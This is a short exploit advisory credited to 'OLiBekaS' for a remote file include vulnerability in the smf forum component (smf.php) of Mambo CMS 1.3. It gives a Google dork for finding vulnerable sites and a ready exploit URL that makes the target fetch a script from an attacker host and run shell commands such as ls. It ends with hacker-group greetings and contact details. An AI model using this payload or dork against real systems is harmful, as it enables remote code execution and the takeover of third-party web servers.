--------------------------------------------------------------------------------

Title : smf forum for Mambo CMS <= 1.3 Remote File Include Vulnerabilities

###############################################################################

Discovered By OLiBekaS

-----------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : component for Mambo CMS
version : 1.3

-----------------------------------------------------------------------------

bug found in file : smf.php

dork        : allinurl:"com_smf"

Exploit     :  

http://[target]/[path]/components/com_smf/smf.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls          
               
------------------------------------------------------------------------------

greatz:
~~~~~

# Special greetz to my master effex and bEdAh`oTaK ( thank man )
# To all members of #papmahackerlink, cgibin, weleh, skulmatic, sikunYuk, brokencode, ulga, SaMuR4i_X, bigmaster, yugo^cloudy. and other

-------------------------------------------------------------------------------


Contact:
~~~~~~~

Nick: OLiBekaS
E-mail: olibekas[at]gmail[dot]Com
Homepage: http://bekas.6te.net

--------------------------------- [ eof ] ---------------------------------------